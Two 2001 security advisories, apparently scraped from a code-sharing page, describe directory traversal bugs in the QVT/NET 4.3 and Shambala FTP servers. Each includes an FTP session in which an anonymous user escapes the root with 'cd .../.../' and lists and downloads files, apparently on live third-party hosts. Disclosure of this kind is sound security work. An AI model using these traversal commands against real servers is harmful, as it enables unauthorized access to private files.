📄 alt3kx-advisories-2001.txt
字号:
====================================================================== QVT/NET 4.3 FTP server Directory TraversalAuthor: alt3kx! <alt3kx@raza-mexicana.org>Date: 2001-05-22Site: www.raza-mexicana.orgGreet to: _0x90_, dr_fdisk^, Dex, PaTaTeams: Raregazz - X-ploit and S0dvicente F0x no rulas wey!======================================================================------------------------=[Brief Description]=-------------------------QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.A bug allows any user to change to any directory and see files to PATHalso GET files remotely.----------------------------=[Plataforms]=-------------------------------Windows 9.xWindows NTwindows 2000-----------------------------=[Summary]=---------------------------------When sending the command "CWD ..." (or "cd ..." in the default FTPclient), the server will go one directory up.EXploit:C:\>ftp server.vulnerable.comConnected to server.vulnerable.com.220 shell FTP server (QVT/Net 4.3) ready.User (server.vulnerable.com:(none)): anonymous331 Guest login OK, please send real ident as password.Password:230 Guest login OK, access restrictions apply.ftp> cd ..501 CWD command not allowed.SO THE BUG... ...ftp>cd .../.../.../.../.../.../250 CWD command successful.ftp> dir200 PORT command successful.150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exedrwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exedrwxrwxrwx 1 nobody system 0 Jan 18 17:44 nortondrwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Filesdrwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins....-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txtdrwxrwxrwx 1 nobody system 0 May 4 16:51 XXXXdrwxrwxrwx 1 nobody system 0 May 8 13:17 teensdrwxrwxrwx 1 nobody system 0 May 8 13:18 tmp-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt226 Transfer complete.ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.ftp> get raza-alt3kx.txt200 PORT command successful.150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) (168 bytes).226 Transfer complete.ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.ftp>quit221 Goodbye.C:\>type raza-alt3kx.txtBug discovered by alt3kx! <alt3kx@raza-mexicana.org>C:\>-------------------------------=[Patch]=---------------------------------The recomended action is to changue the persmissions or defineindividual directory for users anonymous with files no compromise.-------------------------=[Company Compromise]=--------------------------Company:http//www.qpc.com====================================================================== Shambala FTP server Directory TraversalAuthor: alt3kx! <alt3kx@raza-mexicana.org>Date: 2001-05-22Site: www.raza-mexicana.orgGreet to: _0x90_, dr_fdisk^, Dex, PaTaTeams: Raregazz - X-ploit and S0dvicente F0x no rulas weyete!======================================================================------------------------=[Brief Description]=-------------------------Shambala FTP Server is an FTP server for Windows 9x/NT/2000.A bug allows any user to change to any directory and see files to PATHalso GET files remotely.----------------------------=[Plataforms]=-----------------------------Windows 9.xWindows NTwindows 2000-----------------------------=[Summary]=---------------------------------When sending the command "CWD ..." (or "cd ..." in the default FTPclient), the server will go one directory up.Exploit:alt3kx@machine:/tmp$ ftp 1.xx.xx.xxConnected to 1.xx.xx.xx.220 1.xx.xx.xx - Shambala FTP Server Ready.Name (1.xx.xx.xx:Administrator): anonymous331 Password required for anonymous.Password:230 User anonymous logged in.ftp> cd ..550 Requested action not taken. Permission denied.ftp> pwd257 "/" is current directory.ftp> dir200 PORT command successful.150 Opening data connection. d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx ---------- owner group 283 21-maj-01 17:55 index-_-1_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-2_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-3_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-4_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-5_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-6_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-7_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-8_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-9_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-10_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-11_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-12_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-13_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-14_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-15_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-16_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_0_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_0_0_-1.htm ---------- owner group 283 21-maj-01 17:55 .htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-2.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-3.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-4.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-5.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-6.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-7.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-8.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-9.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-10.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-11.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-12.htm ---------- owner group 283 21-maj-01 18:08 index-_0_-1_-11.htm ---------- owner group 283 21-maj-01 18:08 index-_1_0_-11.htm ---------- owner group 283 21-maj-01 18:08 index-_-1_0_-11.htm226 Transfer completeftp> cd ../550 Requested action not taken. Permission denied.ftp>EXPLOIT... ...ftp> cd /.../.../257 CWD command successful.ftp> dir200 PORT command successful.150 Opening data connection. ---------- owner group 15444 04-maj-01 14:26 SCAN.log ---------- owner group 140340 04-maj-01 14:05 MAILS-PRESIDENCIA.txt ---------- owner group 466944 18-sep-99 09:32 Shambala.exe ---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG ---------- owner group 31 21-maj-01 17:50 passwordsxxx.txt d--------- owner group 0 21-maj-01 17:50 Web226 Transfer complete.ftp>ftp> cd /.../.../.../.../257 CWD command successful.ftp> dir200 PORT command successful.150 Opening data connection. ---------- owner group 246928 18-jan-01 13:10 N6Setup.exe d--------- owner group 0 18-jan-01 15:39 Netscape 6 d--------- owner group 0 18-jan-01 14:50 Netscape 6 Setup ---------- owner group 3209110 19-jan-01 10:51 getrgt.exe..... ---------- owner group 168 21-maj-01 19:07 raza-alt3kx.txtftp> get raza-alt3kx.txt200 PORT command successful.150 Opening data connection.226 Transfer complete.168 bytes received in 0 seconds (168 bytes/s)ftp> quit221 Goodbye.alt3kx@machine:/tmp$ cat raza-alt3kx.txtBug discovered by alt3kx! <alt3kx@raza-mexicana.org>alt3kx@machine:/tmp$-------------------------------=[Patch]=------------------------------The recomended action is to changue the persmissions or defineindividual directory for users anonymous with files not compromise.-------------------------=[Company Compromise]=-----------------------http://www.evolvable.com⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -